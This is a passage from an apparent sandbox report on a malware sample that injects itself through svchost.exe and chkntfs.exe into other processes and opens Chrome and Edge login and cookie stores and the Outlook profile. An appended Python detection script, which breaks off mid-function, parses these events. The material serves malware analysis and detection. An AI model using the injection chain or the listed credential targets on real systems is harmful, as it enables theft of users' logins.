                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] (listed 9 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] (listed 6 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] (listed 13 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E90B62 GetSecurityDescriptorDacl, GetAclInformation, GetLengthSid, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree
                Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E62622 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E5083F IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E509D5 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E50C21 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtCreateFile: Direct from: 0x77382FEC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtOpenFile: Direct from: 0x77382DCC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; NtProtectVirtualMemory: Direct from: 0x77377B2E
                Source: C:\Users\user\Desktop\1001-13.exe; Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\chkntfs.exe; Section loaded: NULL target: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe protection: read write
                Source: C:\Windows\SysWOW64\chkntfs.exe; Section loaded: NULL target: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\chkntfs.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\chkntfs.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\chkntfs.exe; Thread register set: target process: 2144
                Source: C:\Windows\SysWOW64\chkntfs.exe; Thread APC queued: target process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                Source: C:\Users\user\Desktop\1001-13.exe; Memory written: C:\Windows\SysWOW64\svchost.exe base: 811008
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00E91201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00E72BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00E9B226 SendInput,keybd_event
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00EB22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
                Source: C:\Users\user\Desktop\1001-13.exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1001-13.exe"
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe; Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
                Source: C:\Windows\SysWOW64\chkntfs.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00E90B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00E91663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: 1001-13.exe; Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: OlGIUOYUZW.exe, 00000007.00000002.3994650361.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000000.2544829229.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996136932.0000000000D01000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: IProgram Manager
                Source: 1001-13.exe, OlGIUOYUZW.exe, 00000007.00000002.3994650361.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000000.2544829229.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996136932.0000000000D01000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: OlGIUOYUZW.exe, 00000007.00000002.3994650361.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000000.2544829229.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996136932.0000000000D01000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: OlGIUOYUZW.exe, 00000007.00000002.3994650361.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000000.2544829229.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996136932.0000000000D01000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00E50698 cpuid
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00EA8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00E8D27A GetUserNameW
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00E6B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00E342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3993353772.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3995415844.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\chkntfs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\chkntfs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\chkntfs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\chkntfs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\chkntfs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\chkntfs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\chkntfs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\chkntfs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\chkntfs.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: 1001-13.exe; Binary or memory string: WIN_81
                Source: 1001-13.exe; Binary or memory string: WIN_XP
                Source: 1001-13.exe; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: 1001-13.exe; Binary or memory string: WIN_XPe
                Source: 1001-13.exe; Binary or memory string: WIN_VISTA
                Source: 1001-13.exe; Binary or memory string: WIN_7
                Source: 1001-13.exe; Binary or memory string: WIN_8
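The two observations above that a responder would turn into detections are the injection chain in the HIPS / PFW section (1001-13.exe writes into and maps a section into svchost.exe, which maps into chkntfs.exe, which queues an APC into OlGIUOYUZW.exe and maps into firefox.exe) and chkntfs.exe, a disk-check utility, opening Chrome and Edge credential stores and the Outlook profile key. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses report lines of the form shown on this page (both the fused extraction form, "exeSection loaded:", and a "; "-separated form) into events and flags cross-process injection edges, an image/command-line mismatch at process creation (the hollowing tell behind svchost.exe started as "C:\Users\user\Desktop\1001-13.exe"), Nt* calls reported as "Direct from", and credential-store access by anything other than the application that owns the store. The owner allow-lists are assumptions, and the sample input is constructed from lines on this page.

```python
"""Parse Joe Sandbox behaviour lines and flag injection edges, hollowing and
credential-store access. Added example; not part of the report or of FormBook."""
import re
from collections import Counter
from pathlib import PureWindowsPath

# Constructed sample: lines copied from the report text above, in the
# extraction-fused form ("...exeSection loaded:"); a "; " separator is also accepted.
SAMPLE_LINES = [
    r"Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior",
    r"Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior",
    r"Source: C:\Users\user\Desktop\1001-13.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\chkntfs.exeThread APC queued: target process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeJump to behavior",
    r"Source: C:\Users\user\Desktop\1001-13.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 811008Jump to behavior",
    r'Source: C:\Users\user\Desktop\1001-13.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1001-13.exe"Jump to behavior',
    r'Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior',
    r"Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior",
    r"Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior",
]

LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe);?\s*"
    r"(?P<kind>Section loaded|Memory written|Thread APC queued|Thread register set|"
    r"Process created|File opened|Key opened|Nt\w+):\s*(?P<rest>.*?)(?:Jump to behavior)?$"
)

# Assumption: only these images are expected to open the respective credential stores.
STORE_OWNERS = {"chrome.exe", "msedge.exe"}
MAIL_OWNERS = {"outlook.exe"}
BROWSER_ROOTS = (r"\google\chrome\user data", r"\microsoft\edge\user data")
BROWSER_STORES = {"login data", "cookies", "web data", "local state"}
MAIL_PROFILE_KEY = r"\windows messaging subsystem\profiles"


def image_name(path):
    return PureWindowsPath(path).name.lower()


def parse_line(line):
    """Split one report line into source image, event kind and the rest; None if not a report line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"src": m["src"], "kind": m["kind"], "rest": m["rest"].strip()}


def analyze(lines):
    f = {"injection": [], "hollowing": [], "credential_access": [], "direct_syscalls": Counter()}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        src, kind, rest = image_name(ev["src"]), ev["kind"], ev["rest"]
        if kind.startswith("Nt") and rest.startswith("Direct from:"):
            f["direct_syscalls"][src] += 1  # Nt* call not issued through the normal ntdll stub
        elif kind == "Section loaded":
            m = re.match(r"NULL target:\s*(.+?)\s+protection:\s*(.+)$", rest)
            if m and image_name(m[1]) != src:
                f["injection"].append((src, image_name(m[1]), "section mapped " + m[2]))
        elif kind == "Memory written":
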